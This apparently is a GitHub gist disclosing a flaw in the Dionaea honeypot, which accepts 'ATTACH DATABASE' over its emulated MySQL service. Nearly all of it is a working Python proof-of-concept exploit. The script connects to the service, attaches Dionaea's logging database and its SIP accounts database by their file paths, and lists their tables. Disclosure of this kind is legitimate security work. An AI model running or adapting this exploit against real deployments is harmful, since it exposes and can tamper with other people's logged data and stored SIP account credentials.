Skip to content

Instantly share code, notes, and snippets.

@ykoster
Created November 19, 2019 15:25
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
Dionaea honeypot allows the "ATTACH DATABASE" command, which can be used to attach to any local SQLite database on which the Dionaea process has read access. If Dionaea has write access, it is even possible to make changes to the database. This includes the logging database (when used) and sipaccounts database.
#!/usr/bin/env python3
import MySQLdb
host = '127.0.0.1'
port = 3306
user = 'root'
passwd = 'passwd'
dbs = ['/opt/dionaea/var/lib/dionaea/dionaea.sqlite', '/opt/dionaea/var/lib/dionaea/sip/accounts.sqlite']
conn = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd)
print(f'[\u001b[32m+\u001b[0m] Connected to {host}:{port}')
i = 0
for db in dbs:
cur = conn.cursor()
try:
cur.execute(f"ATTACH DATABASE '{db}' AS db{i}")
print(f'[\u001b[32m+\u001b[0m] Attached to database: {db}')
print(f'[\u001b[32m+\u001b[0m] Dumping table names:')
cur.execute(f"SELECT name FROM db{i}.sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%'")
for row in cur.fetchall():
print(f'[-] {row[0]}')
i += 1
finally:
cur.close()
conn.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment